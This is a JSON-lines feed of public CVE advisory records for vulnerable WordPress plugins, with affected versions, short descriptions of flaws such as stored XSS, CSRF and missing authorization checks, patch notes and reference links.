{"CVE_ID":"CVE-2023-4838","slug":"simple-download-counter","versionImpact":"1.6","description":"The Simple Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes like 'before' and 'after'. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5f7f2a-c7b7-4339-a608-51fd684c18bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5f7f2a-c7b7-4339-a608-51fd684c18bf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963794\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963794\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5583","slug":"wp-simple-galleries","versionImpact":"1.34","description":"The WP Simple Galleries plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.34 via deserialization of untrusted input from the 'wpsimplegallery_gallery' post meta via 'wpsgallery' shortcode. This allows authenticated attackers, with contributor-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc8f7cf-d8be-4229-b823-3bd9bc9f6eda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc8f7cf-d8be-4229-b823-3bd9bc9f6eda?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-galleries\\\/tags\\\/1.34\\\/wp-simple-gallery.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-galleries\\\/tags\\\/1.34\\\/wp-simple-gallery.php#L250\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1562","slug":"wc-gsheetconnector","versionImpact":"1.3.11","description":"The WooCommerce Google Sheet Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the execute_post_data function in all versions up to, and including, 1.3.11. This makes it possible for unauthenticated attackers to update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2106","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.2.10","description":"The MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 3.2.10. This can allow unauthenticated attackers to extract sensitive data including all registered users' usernames and email addresses, which can be used to help perform future attacks.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/route.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/route.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/classes\\\/models\\\/StmUser.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/classes\\\/models\\\/StmUser.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045511\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.11\\\/_core\\\/lms\\\/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/route.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045511\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.11\\\/_core\\\/lms\\\/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/route.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4370","slug":"wpzoom-elementor-addons","versionImpact":"1.1.36","description":"The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget Image Box in all versions up to, and including, 1.1.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7aaff3e-0c81-4fe7-b162-569c517f6c49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7aaff3e-0c81-4fe7-b162-569c517f6c49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/widgets\\\/image-box\\\/image-box.php#L1229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/widgets\\\/image-box\\\/image-box.php#L1229\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084540\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9117","slug":"mapplic-lite","versionImpact":"1.0","description":"The Mapplic Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a19e1713-1a64-46dc-8b30-b53045b2e01d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a19e1713-1a64-46dc-8b30-b53045b2e01d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapplic-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapplic-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10922","slug":"featured-posts-scroll","versionImpact":"1.25","description":"The Featured Posts Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.25. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4196b8d1-23a7-4b90-8e6b-f51849d44f9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4196b8d1-23a7-4b90-8e6b-f51849d44f9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/featured-posts-scroll\\\/wordpress-featured-posts-scroll-plugin-1-25-csrf-to-stored-cross-site-scripting-xss-vulnerability\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/featured-posts-scroll\\\/wordpress-featured-posts-scroll-plugin-1-25-csrf-to-stored-cross-site-scripting-xss-vulnerability\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10172","slug":"void-visual-whmcs-element","versionImpact":"1.0.4","description":"The WPBakery Visual Composer WHMCS Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's void_wbwhmcse_laouts_search shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/void-visual-whmcs-element\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/void-visual-whmcs-element\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc4b52c6-1ac2-4f90-a776-c91232f5de34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc4b52c6-1ac2-4f90-a776-c91232f5de34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28168","slug":"wordpress-console","versionImpact":"0.3.9","description":"Missing Authorization vulnerability in Jerod Santo WordPress Console allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Console: from n\/a through 0.3.9.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-console\\\/vulnerability\\\/wordpress-wordpress-console-plugin-0-3-9-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-console\\\/vulnerability\\\/wordpress-wordpress-console-plugin-0-3-9-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11411","slug":"spotlightr","versionImpact":"0.1.9","description":"The Spotlightr plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spotlightr-v' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotlightr\\\/trunk\\\/spotlightr.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotlightr\\\/trunk\\\/spotlightr.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotlightr\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotlightr\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/475f2758-27a5-4a36-8085-576ee341938b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/475f2758-27a5-4a36-8085-576ee341938b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13094","slug":"wp-triggers-lite","versionImpact":"2.5.3","description":"The WP Triggers Lite WordPress plugin through 2.5.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a75809e-824e-458e-bd01-50dadcea7713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0801","slug":"ratemyagent-official","versionImpact":"1.4.0","description":"The RateMyAgent Official plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.0. This is due to missing or incorrect nonce validation on the 'rma-settings-wizard'. This makes it possible for unauthenticated attackers to update the plugin's API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244718%40ratemyagent-official&new=3244718%40ratemyagent-official&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244718%40ratemyagent-official&new=3244718%40ratemyagent-official&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ratemyagent-official\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ratemyagent-official\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b559017c-f1d2-4f18-bfb6-e52f05910e34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b559017c-f1d2-4f18-bfb6-e52f05910e34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7195","slug":"wp-reply-notify","versionImpact":"1.1","description":"The WP-Reply Notify WordPress plugin through 1.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72279ca0-6365-4c83-adca-4d8e5808a8c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72279ca0-6365-4c83-adca-4d8e5808a8c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4216","slug":"ecava-diot-scada","versionImpact":"1.0.5.1","description":"The DIOT SCADA with MQTT plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'diot' shortcode in all versions up to, and including, 1.0.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecava-diot-scada\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecava-diot-scada\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf23d79-5bd3-4224-835d-174653ddd504?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf23d79-5bd3-4224-835d-174653ddd504?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6813","slug":"aapanel-wp-toolkit","description":"The aapanel WP Toolkit plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks within the auto_login() function in versions 1.0 to 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to bypass all role checks and gain full admin privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aapanel-wp-toolkit\\\/tags\\\/1.1\\\/includes\\\/class-aapanel-wp-toolkit-agent.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aapanel-wp-toolkit\\\/tags\\\/1.1\\\/includes\\\/class-aapanel-wp-toolkit-agent.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aapanel-wp-toolkit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aapanel-wp-toolkit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/430a0b93-2cb7-45bf-86ac-4a8b3a0be77a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/430a0b93-2cb7-45bf-86ac-4a8b3a0be77a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8567","slug":"the-plus-addons-for-block-editor","versionImpact":"4.5.4","description":"The Nexter Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 4.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342664\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342664\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-block-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-block-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca9ad8ca-aad1-4950-b540-64ffc4a07c12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca9ad8ca-aad1-4950-b540-64ffc4a07c12?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25145","slug":"pirate-forms","versionImpact":"2.5.1","description":"The Contact Form & SMTP Plugin by PirateForms plugin for WordPress is vulnerable to HTML injection in the \u2018public\/class-pirateforms-public.php\u2019 file in versions up to, and including, 2.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary HTML in emails that could be used to phish unsuspecting victims.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34c3f6-cc84-4e45-9948-6f7fd5cba8cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34c3f6-cc84-4e45-9948-6f7fd5cba8cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/html-injection-vulnerability-in-wordpress-pirate-forms-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/html-injection-vulnerability-in-wordpress-pirate-forms-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2529","slug":"enable-svg-uploads","versionImpact":"2.1.5","description":"The Enable SVG Uploads WordPress plugin through 2.1.5 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ac03907-2373-48f0-bca1-8f7073c06b18\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ac03907-2373-48f0-bca1-8f7073c06b18\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5566","slug":"smpl-shortcodes","versionImpact":"1.0.20","description":"The Simple Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L386\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L257\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smpl-shortcodes\\\/tags\\\/1.0.20\\\/includes\\\/shortcodes.php#L292\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a153d6b2-e3fd-42db-90ba-d899a07d60c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a153d6b2-e3fd-42db-90ba-d899a07d60c1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1501","slug":"wordpress-database-reset","versionImpact":"3.22","description":"The Database Reset plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.22. This is due to missing or incorrect nonce validation on the install_wpr() function. This makes it possible for unauthenticated attackers to install the WP Reset Plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-database-reset\\\/trunk\\\/class-db-reset-admin.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-database-reset\\\/trunk\\\/class-db-reset-admin.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4363","slug":"visual-portfolio","versionImpact":"3.3.2","description":"The Visual Portfolio, Photo Gallery & Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_tag\u2019 parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5e09d8-6fa3-4a5b-bee1-6648df4f4b3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5e09d8-6fa3-4a5b-bee1-6648df4f4b3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visual-portfolio\\\/trunk\\\/templates\\\/items-list\\\/item-parts\\\/title.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visual-portfolio\\\/trunk\\\/templates\\\/items-list\\\/item-parts\\\/title.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visual-portfolio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visual-portfolio\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5768","slug":"mimo-woocommerce-order-tracking","versionImpact":"1.0.2","description":"The MIMO Woocommerce Order Tracking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mimo_update_provider' function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update shipping provider information, including adding stored cross-site scripting.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa26e595-947c-4327-bbe1-c347688f1209?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa26e595-947c-4327-bbe1-c347688f1209?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9115","slug":"common-tools-for-site","versionImpact":"1.0.2","description":"The Common Tools for Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0864b6e-e193-4704-99ec-a5f2232c4816?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0864b6e-e193-4704-99ec-a5f2232c4816?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-tools-for-site\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-tools-for-site\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
